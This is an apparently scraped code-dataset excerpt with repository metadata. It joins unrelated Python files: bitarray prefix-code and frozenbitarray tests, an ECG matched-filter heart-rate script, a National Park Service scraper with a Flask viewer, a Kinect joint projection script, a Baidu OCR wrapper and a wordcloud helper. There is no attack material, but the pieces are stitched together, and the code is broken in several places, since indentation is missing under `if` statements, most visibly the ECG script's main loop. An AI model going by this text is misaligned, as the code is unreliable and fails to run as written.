        self.assertEqual(a.decode(d), [])
        self.assertEqual(d, {'a': bitarray('1')})
        # test decode iterator
        self.assertEqual(list(a.iterdecode(d)), [])
        self.assertEqual(d, {'a': bitarray('1')})
        self.assertEqual(len(a), 0)

    def test_decode_no_term(self):
        # trailing bits that do not complete a code word raise ValueError
        d = {'a': bitarray('0'), 'b': bitarray('111')}
        a = bitarray('011')
        self.assertRaises(ValueError, a.decode, d)
        self.assertEqual(a, bitarray('011'))
        self.assertEqual(d, {'a': bitarray('0'), 'b': bitarray('111')})

    def test_decode_buggybitarray(self):
        # bits that match no code word at all raise ValueError
        d = {'a': bitarray('0')}
        a = bitarray('1')
        self.assertRaises(ValueError, a.decode, d)
        self.assertEqual(a, bitarray('1'))
        self.assertEqual(d, {'a': bitarray('0')})

    def test_iterdecode_no_term(self):
        d = {'a': bitarray('0'), 'b': bitarray('111')}
        a = bitarray('011')
        it = a.iterdecode(d)
        if not is_py3k:
            # generator .next() exists only on Python 2
            self.assertEqual(it.next(), 'a')
            self.assertRaises(ValueError, it.next)
        self.assertEqual(a, bitarray('011'))
        self.assertEqual(d, {'a': bitarray('0'), 'b': bitarray('111')})

    def test_iterdecode_buggybitarray(self):
        d = {'a': bitarray('0')}
        a = bitarray('1')
        it = a.iterdecode(d)
        if not is_py3k:
            self.assertRaises(ValueError, it.next)
        self.assertEqual(a, bitarray('1'))
        self.assertEqual(d, {'a': bitarray('0')})

    def test_decode_buggybitarray2(self):
        d = {'a': bitarray('00'), 'b': bitarray('01')}
        a = bitarray('1')
        self.assertRaises(ValueError, a.decode, d)
        self.assertEqual(a, bitarray('1'))

    def test_iterdecode_buggybitarray2(self):
        d = {'a': bitarray('00'), 'b': bitarray('01')}
        a = bitarray('1')
        it = a.iterdecode(d)
        if not is_py3k:
            self.assertRaises(ValueError, it.next)
        self.assertEqual(a, bitarray('1'))

    def test_decode_ambiguous_code(self):
        # codes where one word equals or is a prefix of another are rejected
        for d in [
            {'a': bitarray('0'), 'b': bitarray('0'), 'c': bitarray('1')},
            {'a': bitarray('01'), 'b': bitarray('01'), 'c': bitarray('1')},
            {'a': bitarray('0'), 'b': bitarray('01')},
            {'a': bitarray('0'), 'b': bitarray('11'), 'c': bitarray('111')},
        ]:
            a = bitarray()
            self.assertRaises(ValueError, a.decode, d)
            self.assertRaises(ValueError, a.iterdecode, d)

    def test_miscitems(self):
        # mixed-type symbols round-trip through encode/decode/iterdecode
        d = {None : bitarray('00'),
             0 : bitarray('110'),
             1 : bitarray('111'),
             '' : bitarray('010'),
             2 : bitarray('011')}
        a = bitarray()
        a.encode(d, [None, 0, 1, '', 2])
        self.assertEqual(a, bitarray('00110111010011'))
        self.assertEqual(a.decode(d), [None, 0, 1, '', 2])
        # iterator
        it = a.iterdecode(d)
        self.assertEqual(next(it), None)
        self.assertEqual(next(it), 0)
        self.assertEqual(next(it), 1)
        self.assertEqual(next(it), '')
        self.assertEqual(next(it), 2)
        self.assertStopIteration(it)

    def test_real_example(self):
        # a realistic variable-length (Huffman-style) code for English text
        code = {' ': bitarray('001'),
                '.': bitarray('0101010'),
                'a': bitarray('0110'),
                'b': bitarray('0001100'),
                'c': bitarray('000011'),
                'd': bitarray('01011'),
                'e': bitarray('111'),
                'f': bitarray('010100'),
                'g': bitarray('101000'),
                'h': bitarray('00000'),
                'i': bitarray('1011'),
                'j': bitarray('0111101111'),
                'k': bitarray('00011010'),
                'l': bitarray('01110'),
                'm': bitarray('000111'),
                'n': bitarray('1001'),
                'o': bitarray('1000'),
                'p': bitarray('101001'),
                'q': bitarray('00001001101'),
                'r': bitarray('1101'),
                's': bitarray('1100'),
                't': bitarray('0100'),
                'u': bitarray('000100'),
                'v': bitarray('0111100'),
                'w': bitarray('011111'),
                'x': bitarray('0000100011'),
                'y': bitarray('101010'),
                'z': bitarray('00011011110')}
        a = bitarray()
        message = 'the quick brown fox jumps over the lazy dog.'
        a.encode(code, message)
        self.assertEqual(a, bitarray('01000000011100100001001101000100101100'
            '00110001101000100011001101100001111110010010101001000000010001100'
            '10111101111000100000111101001110000110000111100111110100101000000'
            '0111001011100110000110111101010100010101110001010000101010'))
        self.assertEqual(''.join(a.decode(code)), message)
        self.assertEqual(''.join(a.iterdecode(code)), message)
tests.append(PrefixCodeTests)
# -------------- Buffer Interface (Python 2.7 and above) --------------------
class BufferInterfaceTests(unittest.TestCase):
    """Exercise the buffer protocol (memoryview) support of bitarray."""

    def test_read1(self):
        a = bitarray('01000001' '01000010' '01000011', endian='big')
        v = memoryview(a)
        # one memoryview item per underlying byte
        self.assertEqual(len(v), 3)
        # items are ints on Python 3, 1-char strings on Python 2
        self.assertEqual(v[0], 65 if is_py3k else 'A')
        self.assertEqual(v.tobytes(), b'ABC')
        # the view is live: mutating the bitarray is visible through it
        a[13] = 1
        self.assertEqual(v.tobytes(), b'AFC')

    def test_read2(self):
        a = bitarray()
        a.frombytes(os.urandom(100))
        v = memoryview(a)
        self.assertEqual(len(v), 100)
        # byte-slices of the view match bit-slices of the array
        b = a[34 * 8 : 67 * 8]
        self.assertEqual(v[34:67].tobytes(), b.tobytes())
        self.assertEqual(v.tobytes(), a.tobytes())

    def test_write(self):
        a = bitarray(8000)
        a.setall(0)
        v = memoryview(a)
        self.assertFalse(v.readonly)
        # writing a byte through the view sets the corresponding 8 bits
        v[500] = 255 if is_py3k else '\xff'
        self.assertEqual(a[3999:4009], bitarray('0111111110'))
        a[4003] = 0
        self.assertEqual(a[3999:4009], bitarray('0111011110'))
        v[301:304] = b'ABC'
        self.assertEqual(a[300 *8 : 305 * 8].tobytes(), b'\x00ABC\x00')
if sys.version_info[:2] >= (2, 7):
tests.append(BufferInterfaceTests)
# ---------------------------------------------------------------------------
class TestsFrozenbitarray(unittest.TestCase, Util):
    """Tests for the immutable, hashable frozenbitarray subclass."""

    def test_init(self):
        a = frozenbitarray('110')
        self.assertEqual(a, bitarray('110'))
        self.assertEqual(a.to01(), '110')
        for endian in 'big', 'little':
            a = frozenbitarray(0, endian)
            self.assertEqual(a.endian(), endian)

    def test_methods(self):
        # test a few methods which do not raise the TypeError
        a = frozenbitarray('1101100')
        self.assertEqual(a[2], 0)
        self.assertEqual(a[:4].to01(), '1101')
        self.assertEqual(a.count(), 4)
        self.assertEqual(a.index(0), 2)
        b = a.copy()
        self.assertEqual(b, a)
        # copy() of a frozenbitarray is again a frozenbitarray
        self.assertEqual(repr(type(b)), "<class 'bitarray.frozenbitarray'>")
        self.assertEqual(len(b), 7)
        self.assertEqual(b.length(), 7)
        self.assertEqual(b.all(), False)
        self.assertEqual(b.any(), True)

    def test_init_bitarray(self):
        # constructing from (frozen)bitarrays copies and preserves endianness
        for a in self.randombitarrays():
            b = frozenbitarray(a)
            self.assertFalse(b is a)
            self.assertEqual(b, a)
            self.assertEqual(b.endian(), a.endian())
            c = frozenbitarray(b)
            self.assertEqual(c, b)
            self.assertFalse(c is b)
            self.assertEqual(c.endian(), a.endian())
            self.assertEqual(hash(c), hash(b))

    def test_repr(self):
        a = frozenbitarray()
        self.assertEqual(repr(a), "frozenbitarray()")
        self.assertEqual(str(a), "frozenbitarray()")
        a = frozenbitarray('10111')
        self.assertEqual(repr(a), "frozenbitarray('10111')")
        self.assertEqual(str(a), "frozenbitarray('10111')")

    def test_immutable(self):
        # any mutating operation must raise TypeError
        a = frozenbitarray('111')
        self.assertRaises(TypeError, a.append, True)
        self.assertRaises(TypeError, a.__setitem__, 0, 0)
        self.assertRaises(TypeError, a.__delitem__, 0)

    def test_dictkey(self):
        a = frozenbitarray('01')
        b = frozenbitarray('1001')
        d = {a: 123, b: 345}
        self.assertEqual(d[frozenbitarray('01')], 123)
        self.assertEqual(d[frozenbitarray(b)], 345)

    def test_dictkey2(self):  # taken slightly modified from issue #74
        a1 = frozenbitarray([True, False])
        a2 = frozenbitarray([False, False])
        dct = {a1: "one", a2: "two"}
        a3 = frozenbitarray([True, False])
        self.assertEqual(a3, a1)
        self.assertEqual(dct[a3], 'one')

    def test_mix(self):
        # frozen and mutable bitarrays interoperate in + and extend()
        a = bitarray('110')
        b = frozenbitarray('0011')
        self.assertEqual(a + b, bitarray('1100011'))
        a.extend(b)
        self.assertEqual(a, bitarray('1100011'))
tests.append(TestsFrozenbitarray)
# ---------------------------------------------------------------------------
def run(verbosity=1, repeat=1):
    """Build the full test suite (including bitarray.test_util) and run it.

    Each test class is added `repeat` times; returns the TextTestRunner
    result object.
    """
    import bitarray.test_util as btu
    tests.extend(btu.tests)
    for label, value in (('bitarray is installed in', os.path.dirname(__file__)),
                         ('bitarray version', __version__),
                         ('Python version', sys.version)):
        print('%s: %s' % (label, value))
    suite = unittest.TestSuite()
    for cls in tests:
        suite.addTests(unittest.makeSuite(cls) for _ in range(repeat))
    return unittest.TextTestRunner(verbosity=verbosity).run(suite)
if __name__ == '__main__':
run()
| MLY0813/FlashSwapForCofixAndUni | FlashSwapForCofixAndUni/venv/lib/python3.9/site-packages/bitarray/test_bitarray.py | test_bitarray.py | py | 78,361 | python | en | code | 70 | github-code | 36 | [
{
"api_name": "sys.version_info",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "random.randint",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "bitarray.bitarray",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "random.randint... |
70631265063 | #Importing required libraries
import numpy as np
from matplotlib import pyplot as plt
import firfilter
import hpbsfilter
#Function that plots the time domain waveform of the signal of interest
def PlotWaveform(title, ycords, fs=1000):
    """Plot a signal's time-domain waveform.

    Parameters
    ----------
    title : str
        Figure title.
    ycords : sequence of float
        Sample values (amplitude in mV).
    fs : int, optional
        Sampling frequency in Hz; defaults to 1000 (the ECG rate used
        throughout this script), so existing callers are unaffected.
    """
    plt.figure(figsize=(13.33, 7.5))
    plt.title(title)
    plt.xlabel('Time [s]')
    plt.ylabel('Amplitude [mV]')
    # convert sample indices to seconds on the x axis
    time = np.linspace(0, len(ycords) / fs, len(ycords))
    plt.plot(time, ycords)
    plt.show()
#Function that plots the step graph for of the Momentary Heart Rate changes along time
def PlotWaveformStep(title, ycords, fs=1000):
    """Plot a signal as a step graph (used for the momentary heart rate).

    Parameters
    ----------
    title : str
        Figure title.
    ycords : sequence of float
        Sample values.
    fs : int, optional
        Sampling frequency in Hz; defaults to 1000 so existing callers
        are unaffected (mirrors PlotWaveform).
    """
    plt.figure(figsize=(13.33, 7.5))
    plt.title(title)
    plt.xlabel('Time [s]')
    plt.ylabel('Amplitude [mV]')
    # convert sample indices to seconds on the x axis
    time = np.linspace(0, len(ycords) / fs, len(ycords))
    plt.step(time, ycords)
    plt.show()
#Function that creates the ecg template for the matched FIR filter
def GenerateECGTemplate(samples, samplingFrequency):
    """Create the time-reversed ECG template used as matched-filter coefficients.

    The raw samples are band-stop filtered (45-55 Hz mains removal) and
    high-pass filtered (0.5 Hz cutoff), one beat is sliced out, and the
    slice is time-reversed to form the matched-filter coefficients.
    Returns (fir, template): the reset FIR filter object and the
    template coefficient array.

    NOTE(review): samplingFrequency is unused -- the 1000 Hz rate is
    hard-coded in the filter designs below; confirm before relying on it.
    """
    filteredSamples = []
    finalSamples = []
    # Create the filter coefficients to remove the 50Hz noise and baseband wander
    bandstopfir = hpbsfilter.fir_coeff()
    firCoefficients = bandstopfir.bandstopDesign(1000, 45, 55)
    # Initialize FIR
    fir = firfilter.FIR_filter(firCoefficients)
    # Generating the template from only the first 4000 samples to prevent long wait time
    for x in range(4000):
        filteredSamples.append(fir.dofilter(samples[x]))
    highpassfir = hpbsfilter.fir_coeff()
    firCoefficients = highpassfir.highpassDesign(1000, 0.5)
    # Initialize FIR
    fir = firfilter.FIR_filter(firCoefficients)
    for x in range(4000):
        finalSamples.append(fir.dofilter(filteredSamples[x]))
    # Plot Filtered ECG waveform
    PlotWaveform("Filtered ECG", finalSamples)
    # Get one period of the filtered ECG to form the template
    ecgSlice = finalSamples[2800:3600]  # [760:870]
    # Flip to create the time-reversed template for the filter coefficients
    template = np.flip(ecgSlice)
    # Plotting both the ECG slices
    hpbsfilter.ecgNormPlot('ECG Slice', ecgSlice)
    hpbsfilter.ecgNormPlot('ECG Template', template)
    # Reset the FIR filter's ring buffer and offset before reuse
    fir.ResetFilter()
    # Return the filter object and template coefficients
    return fir, template
#Main body of the program
if __name__ == "__main__":
#Load the ecg data
ecg_data = np.loadtxt("ECG_1000Hz_13.dat")
fs = 1000
nofsamples = len(ecg_data)
fir, template = GenerateECGTemplate(ecg_data, 1000)
filteredSmaples = np.zeros(nofsamples)
squaredSamples = np.zeros(nofsamples)
# Peak Detector with Heart rate tracking
#Define the peak detector variables
peakIndex = []
# Momentary heart rate array
m = []
lastPeak = 0
nPeaks = 0
#Heuristics variable to prevent bogus detection
pulseSettlingSamplecCnt = 37
peakFlag = False
#Set the threshold to detect peaks based on the amplitude of the delta plulses
amplitudeThreshold = 20
# Initialize matched filter object
Templatefir = firfilter.FIR_filter(template)
# Simulate causal system by filtering signal sample by sample
# Filter the baseband wander and 50hH
filteredSmaples = hpbsfilter.finalfilteredECGData()
for x in range(nofsamples):
# Apply the matched filter to generate the peaks
squaredSamples[x] = Templatefir.dofilter(filteredSmaples[x])
# Square the output samples to pronounce the amplitude and suppress the noise to get the delta pulses
squaredSamples[x] = squaredSamples[x] * squaredSamples[x]
# Wait for the filter to settle
if(x > 2000):
# Detect the peaks
# If sample amplitude is above threshold, the peak hasn't been detected yet with some heuristics to prevent bogus detections
if( squaredSamples[x] > amplitudeThreshold and peakFlag == False and (x - lastPeak ) >= pulseSettlingSamplecCnt ):
peakFlag = True
# If the amplitude exceeded the threshold and previous sample was higher that must've been a peak
if( squaredSamples[x - 1] > squaredSamples[x] and peakFlag == True ):
peakFlag = False
# Holding the index as last peak index
lastPeak = (x - 1)
#Append the index of that sample to list
peakIndex.append( lastPeak )
# Increment peak counter
nPeaks += 1
# Calculating the momentary heart rate in BPM
#Minimum of 2 peaks are required to generate the number of samples between them
if ( nPeaks >= 2):
# Calculating the number of samples between peaks
t = lastPeak - peakIndex[ nPeaks - 2]
# Calculating the momentary rate in BPM
m.append( (fs/t)*60 )
# Plotting the original time domain response of the ECG
hpbsfilter.ecgNormPlot('Time domain signal of the original ECG', ecg_data)
# Plotting the filtered time domain response of the ECG
hpbsfilter.ecgNormPlot('Time domain signal of the filtered ECG', filteredSmaples)
# Plotting the filtered frequency response of the ECG
hpbsfilter.ecgFreqPlot('Frequency responce of the filtered ECG',filteredSmaples,fs)
#Plotting the delta pulses returned by the matched filter
PlotWaveform("Delta Pulses obtained after matched filtering", squaredSamples)
#Plotting the momentary heart rate as a step graph
PlotWaveformStep("Momenrary Heart Rate", m)
#Print the number of heart beats detected
print("Number of beats detected: " + str(nPeaks) )
#Print the average BMP detected from the delta pulses
print("Average Momentary Heart Rate (in BPM): %.1f" % (sum(m)/len(m)))
| Devashrutha/ECG-Causal-Processing-using-FIR-Filters | hrdetect.py | hrdetect.py | py | 5,978 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.title",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "ma... |
1116068523 | import os
from flask import Flask, render_template, session, redirect, url_for # tools that will make it easier to build on things
from flask_sqlalchemy import SQLAlchemy # handles database stuff for us - need to pip install flask_sqlalchemy in your virtual env, environment, etc to use this and run this
import requests, json
from bs4 import BeautifulSoup
from advanced_expiry_caching import Cache
# import numpy as np
import pandas as pd
######
# Constants
START_URL = "https://www.nps.gov/index.htm"
FILENAME = "nps_cache.json"
PROGRAM_CACHE = Cache(FILENAME)
# assuming constants exist as such
# use a tool to build functionality here
def access_page_data(url):
    """Return the page at ``url``, serving from the file cache when possible.

    On a cache miss the page is fetched over HTTP and stored (the cache's
    default 7-day expiry applies).
    """
    cached = PROGRAM_CACHE.get(url)
    if cached:
        return cached
    fresh = requests.get(url).text
    PROGRAM_CACHE.set(url, fresh)
    return fresh
###### Scraping the data from the website
main_page = access_page_data(START_URL)
main_soup = BeautifulSoup(main_page, features="html.parser")
# print(main_soup.prettify())
list_of_topics = main_soup.find('ul', class_='dropdown-menu SearchBar-keywordSearch')
# all_links = list_of_topics.find_all('a')
# print(all_links)
states_urls = []
for link in list_of_topics.find_all('a'):
# print(link.get('href'))
states_urls.append("{}{}".format("https://www.nps.gov",link.get('href')))
# print(states_urls)
nps_dic = {} #dictionary of lists
nps_dic['Type'] = []
nps_dic['Name'] = []
nps_dic['Location'] = []
nps_dic['State'] = []
nps_dic['Description'] = []
for url in states_urls:
state_page = access_page_data(url)
state_soup = BeautifulSoup(state_page, features="html.parser")
# print(state_soup.prettify())
for each_item in state_soup.find("h1", class_="page-title"):
sitestate = each_item
# print(sitestate) <--- Check whether it prints out the list of states
for each_item in state_soup.find("ul", id="list_parks").find_all('li', class_="clearfix"):
# print('===============')
# print(each_item)
# print('===============')
sitetype = each_item.find('h2')
sitename = each_item.find('h3').find('a')
sitelocation = each_item.find('h4')
sitedescription = each_item.find('p')
nps_dic['State'].append(sitestate)
if (sitetype) and (sitetype.text != ""):
nps_dic['Type'].append(sitetype.text)
else:
nps_dic['Type'].append("None")
if (sitename) and (sitename.text != ""):
nps_dic['Name'].append(sitename.text)
else:
nps_dic['Name'].append("None")
if (sitelocation) and (sitelocation.text != ""):
nps_dic['Location'].append(sitelocation.text)
else:
nps_dic['Location'].append("None")
if (sitedescription) and (sitedescription.text != ""):
nps_dic['Description'].append(sitedescription.text.strip())
else:
nps_dic['Description'].append("None")
# print(nps_dic)
##### Save the scraped data into CSV file.
nps_data = pd.DataFrame.from_dict(nps_dic)
nps_data.to_csv('nps.csv')
# for each in nps_dic.keys():
# print(len(nps_dic[each]))
###### Now with 'nps.csv' file, I am going to make db file using sqlalchemy.
import sqlite3
import csv
from sqlalchemy import Column, ForeignKey, Integer, String, Text, Float, REAL
sqlite_file = 'nps.db'
# Connecting to the database file
conn = sqlite3.connect(sqlite_file)
c = conn.cursor() # Object that allows us to use Python to act on the database
# Often easier to start with the "simplest" table and go on from there
c.execute('''DROP TABLE IF EXISTS 'State';''')
c.execute('''CREATE TABLE State (StateId INTEGER PRIMARY KEY AUTOINCREMENT, State TEXT)''')
state_lst = []
with open('nps.csv') as csvfile:
readCSV = csv.reader(csvfile, delimiter=',')
for row in readCSV:
if not row[4] in state_lst:
state_lst.append(row[4])
state_lst_itself = state_lst[1:]
# print(state_lst_itself)
c.executemany('INSERT INTO State (State) VALUES(?)', zip(state_lst_itself))
c.execute('''DROP TABLE IF EXISTS 'Park';''')
c.execute('''CREATE TABLE Park (ParkId INTEGER PRIMARY KEY AUTOINCREMENT, ParkName TEXT, ParkType TEXT, ParkLocation TEXT, StateId INTEGER, Description TEXT, CONSTRAINT fk_States FOREIGN KEY (StateId) REFERENCES State(StateId))''')
# Three quotations make it possible for this to become a multi-line string, which can make it easier to organize and read
each_lst = []
with open('nps.csv') as csvfile:
readCSV = csv.reader(csvfile, delimiter=',')
readCSV.__next__()
for row in readCSV:
state_name = (row[4],)
# print(type(state_name))
c.execute("SELECT StateId FROM State WHERE State.State = ?" , state_name)
fetch_state_name = c.fetchone()
state_id = int(fetch_state_name[0])
# print(fetch_state_name)
each_lst.append((row[2], row[1], row[3], state_id, row[5]))
# print(each_lst)
c.executemany('INSERT INTO Park(ParkName, ParkType, ParkLocation, StateId, Description) VALUES (?,?,?,?,?)', each_lst)
conn.commit()
conn.close()
######
# Application configurations
from flask import Flask, render_template, session, redirect, url_for, g
app = Flask(__name__)
DATABASE = 'nps.db'
def get_db():
    """Return the application-context SQLite connection, creating it lazily.

    The connection is memoized on Flask's context global ``g`` so each
    context opens at most one connection to DATABASE.
    """
    db = getattr(g, '_database', None)
    if db is None:
        db = g._database = sqlite3.connect(DATABASE)
    return db
##### Set up Controllers (route functions) #####
## Main route
@app.route('/')
def index():
    """Home page: render index.html with the total number of park rows."""
    cur = get_db().cursor()
    cur.execute("select * from Park")
    rows = cur.fetchall()
    park_num = len(rows)
    return render_template('index.html', park_num = park_num)
@app.route('/all_states')
def all_states():
    """List every state/territory stored in the State table."""
    cur = get_db().cursor()
    cur.execute("select * from State")
    rows = cur.fetchall()
    state_list = []
    for each in rows:
        state_name = each[1]  # column 1 is the state name (0 is StateId)
        state_list.append(state_name)
    # NOTE(review): state_name here is just the LAST row's name, and the
    # view raises NameError if the table is empty -- the template likely
    # only needs state_list; confirm before removing the extra argument.
    return render_template('all_states.html', state_name = state_name, state_list = state_list)
@app.route('/state/<state>')
def each_state(state):
    """Render the parks belonging to one state.

    Filtering is done in SQL with a bound parameter instead of fetching
    every row and comparing in Python, as the original did -- less data
    transferred, and the user-supplied value is never interpolated into
    the query string.  Each list entry is a
    (ParkName, ParkType, ParkLocation, Description) tuple, as before.
    """
    cur = get_db().cursor()
    cur.execute(
        "select ParkName, ParkType, ParkLocation, Description "
        "from Park natural inner join State where State = ?", (state,))
    park_lst = cur.fetchall()
    return render_template('each_state.html', state_name=state, park_lst=park_lst)
if __name__ == '__main__':
app.run()
| graphicsmini/507_project_final | SI507project_tools.py | SI507project_tools.py | py | 6,752 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "advanced_expiry_caching.Cache",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "bs4.Beau... |
43506809963 | import numpy as np
import csv
import os
import cv2
import matplotlib.pyplot as plt
from xml.etree import ElementTree as ET
import argparse
parser = argparse.ArgumentParser(description='compare mediapipe and kinect skeleton data', epilog = 'Enjoy the program! :)')
parser.add_argument('--inputfile', default =r'/datasets_nas/elma1294/example_tape/dominikw_front_0/e4sm_tape-2021-08-18_14-07-44.211275_skeletons.shuttleFront.csv',
help = 'The address of the input csv file')
parser.add_argument('--sample_image', default = r'/datasets_nas/elma1294/example_tape/dominikw_front_0/e4sm_tape-2021-08-18_14-07-44.211275_png.shuttleFront/shuttleFront_Kinect_ColorImage1629288474191866000.jpg',
help = 'sample image to get the width and height of the image')
parser.add_argument('--output_directory', default=r'/datasets_nas/elma1294/results' , help = 'The address of the results')
arguments = parser.parse_args()
path = arguments.inputfile
file_path = arguments.sample_image
output_directory = arguments.output_directory
output_kineckt = os.path.join(output_directory, 'results3Dto2Dnew.csv')
def _parse_camera_parameter(camera_name: str):
    """Parse a serialized Kinect Azure calibration file for one camera.

    Returns ([cx, cy, fx, fy], transform): the color-camera intrinsics
    and the 4x4 homogeneous depth-frame -> color-frame transformation
    (translation converted from millimeters to meters).
    """
    assert camera_name in ['shuttleFront', 'shuttleSide', 'spike']
    # parse serialized kinect azure calibration
    root = ET.parse(f'intrinsics/{camera_name}.xml').getroot()
    root = root.find('KinectAzureCalibration')
    # get color intrinsics as cx, cy, fx, fy
    color_params = root.find('color_camera_calibration')
    # intrinsics are serialized as an ordered list of <item> elements
    intrinsics = color_params.find('intrinsics').find('parameters').findall('item')
    cx = float(intrinsics[0].text)
    cy = float(intrinsics[1].text)
    fx = float(intrinsics[2].text)
    fy = float(intrinsics[3].text)
    # get transformation from depth frame to color frame
    # the kinect sdk defines the local transformation tree as
    # mount frame -> depth_frame -> color_frame
    # so we can just parse the extrinsics from color camera which represents
    # the transformation depth_frame -> color_frame
    extrinsics = color_params.find('extrinsics')
    # NOTE: rotation matrix is serialized as simple vector (row-major, 9 items)
    rotation = extrinsics.find('rotation').findall('item')
    translation = extrinsics.find('translation').findall('item')
    rotation_vec = np.zeros(9)
    for i, el in enumerate(rotation):
        rotation_vec[i] = el.text
    translation_vec = np.zeros(3)
    for i, el in enumerate(translation):
        translation_vec[i] = el.text
    # translation is given in mm
    # as we work in m we convert
    translation_vec *= 0.001
    # assemble the homogeneous 4x4 transform
    transform = np.eye(4)
    transform[:3, :3] = rotation_vec.reshape(3, 3)
    transform[:3, 3] = translation_vec
    return [cx, cy, fx, fy], transform
def convert_3d_to_2d_position(x, y, z, transform, camera_parameter, width, height):
    """Project a 3D point (coordinates given as strings) to a normalized
    2D position in the color image.

    Parameters
    ----------
    x, y, z : str
        Point coordinates in the depth camera frame (may be empty).
    transform : (4, 4) ndarray
        Homogeneous depth-frame -> color-frame transformation.
    camera_parameter : sequence
        Color intrinsics as [cx, cy, fx, fy].
    width, height : int
        Image size used to normalize the pixel coordinates.

    Returns
    -------
    (u, v) in fractions of image width/height, or (0, 0) when any
    coordinate string is empty.
    """
    # Guard against missing coordinates BEFORE converting: the original
    # called float() first, so an empty string raised ValueError and the
    # intended (0, 0) fallback was unreachable.
    if len(x) < 1 or len(y) < 1 or len(z) < 1:
        return 0, 0
    # move the point from the depth camera frame into the color frame
    xc, yc, zc = np.dot(transform, np.array([float(x), float(y), float(z), 1.0]))[:3]
    cx, cy, fx, fy = camera_parameter
    # pinhole projection: pixel = K @ [I | 0] @ [xc yc zc 1]^T
    k = np.array([[fx, 0, cx], [0, fy, cy], [0, 0, 1]])
    proj = np.dot(k, np.array([xc, yc, zc]))
    # perspective divide, then normalize by the image size
    u = float(proj[0] / proj[2]) / width
    v = float(proj[1] / proj[2]) / height
    return u, v
def _plot_sample(joint_dict, img):
    """Overlay the 2D joints of one skeleton row on the camera image.

    ``joint_dict`` holds a leading 'timestamp' entry followed by
    alternating x/y values (normalized to [0, 1]); they are scaled back
    to pixel coordinates before plotting.
    """
    joints = np.zeros(((len(joint_dict) -1) // 2, 2))
    # skip the timestamp; pack alternating values into (n_joints, 2) rows
    for ei, joint in enumerate(list(joint_dict.values())[1:]):
        joints[ei // 2, ei % 2] = joint
    plt.imshow(img)
    # de-normalize: img.shape[:2] is (height, width), reversed to (width, height)
    joints *= img.shape[:2][::-1]
    plt.scatter(joints[:, 0], joints[:, 1], s=10, c='r')
    plt.show()
    # plt.savefig('test.png')
list_of_results = []
camera_params, transform = _parse_camera_parameter('shuttleFront')
img = cv2.imread(file_path, cv2.IMREAD_COLOR)
width = img.shape[1]
height = img.shape[0]
with open(path) as f:
''' read the csv file and convert the 3D Position to 2D Position and save it in a new csv file'''
rows = [{k: v for k, v in row.items()} for row in csv.DictReader(f, skipinitialspace=True)]
for row in rows:
mDict = {}
mDict['timestamp'] = row['timestamp']
for x_header in row.keys():
if '.x' in x_header:
y_header = x_header.replace('.x','.y')
z_header = x_header.replace('.x','.z')
x_value = row[x_header]
y_value = row[y_header]
z_value = row[z_header]
u,v= convert_3d_to_2d_position(x_value,y_value,z_value, transform, camera_params, width, height)
mDict[x_header] = u
mDict[y_header] = v
list_of_results.append(mDict)
_plot_sample(mDict, img)
with open(output_kineckt, 'w', encoding='UTF8', newline='') as f2:
writer = csv.DictWriter(f2, mDict.keys())
writer.writeheader()
writer.writerows(list_of_results)
| elma1294/Neuroinformatic | Mediapipe/3Dto2D.py | 3Dto2D.py | py | 5,279 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "xml.etree.ElementTre... |
35845929436 | from aip import AipOcr
import configparser
class BaiDuAPI:
    """Recognize text in images through the Baidu Cloud OCR API.

    filePath:
    --------
    Full path of the .ini configuration file that holds the work-order
    (credential) information.
    """
    def __init__(self, filePath):
        # Read the API credentials from the ini file.
        target = configparser.ConfigParser()  # initialize the ConfigParser
        target.read(filePath)  # read the ini file
        # target.get(section, option) returns the option's value;
        # '工单密码' is the (Chinese-named) credentials section key in the file
        app_id = target.get('工单密码', 'APP_ID')
        api_key = target.get('工单密码', 'API_KEY')
        secret_key = target.get('工单密码', 'SECRET_KEY')
        """ 你的 APPID AK SK """
        APP_ID = app_id
        API_KEY = api_key
        SECRET_KEY = secret_key
        # authenticated OCR client used by picture2Text()
        self.client = AipOcr(APP_ID, API_KEY, SECRET_KEY)

    def picture2Text(self, filePath):
        """Run general OCR on a local image file and return the concatenated text."""
        image = self.get_file_content(filePath)
        """ 调用通用文字识别, 图片参数为本地图片 """
        # call Baidu's general text recognition with the local image bytes
        texts = self.client.basicGeneral(image)
        allTexts = ''
        # join the recognized lines into one string
        for words in texts['words_result']:
            allTexts = allTexts + ''.join(words.get('words',''))
        return allTexts

    @classmethod
    def get_file_content(cls, filePath):
        """Read an image file and return its raw bytes."""
        with open(filePath, 'rb') as fp:
            return fp.read()
if __name__ == '__main__':
baiduapi = BaiDuAPI(
r'D:\Windows 7 Documents\Documents\PythonCode\24\password.ini')
allTexts = baiduapi.picture2Text(
r'D:\Windows 7 Documents\Documents\PythonCode\24\Snipaste_2018-05-19_22-42-33.png')
print(allTexts)
| web-yuzm/ScreenShot | baidu.py | baidu.py | py | 1,875 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "configparser.ConfigParser",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "aip.AipOcr",
"line_number": 27,
"usage_type": "call"
}
] |
12424365843 | from wordcloud import WordCloud
from PIL import Image
def make_ngram_wordcloud(count, target, filename):
wordcloud = WordCloud(
font_path = '../d2coding.ttf',
width = 800,
height = 800,
background_color = "white"
)
gen = wordcloud.generate_from_frequencies(count)
array = gen.to_array()
save_as_image(array, target, filename)
def save_as_image(data, target, filename):
im = Image.fromarray(data)
im.save("./" + target + "/" + filename + ".jpg") | ghyeon0/BigData_Homework | HW4/HW4_renew/draw_wordcloud.py | draw_wordcloud.py | py | 502 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "wordcloud.WordCloud",
"line_number": 5,
"usage_type": "call"
},
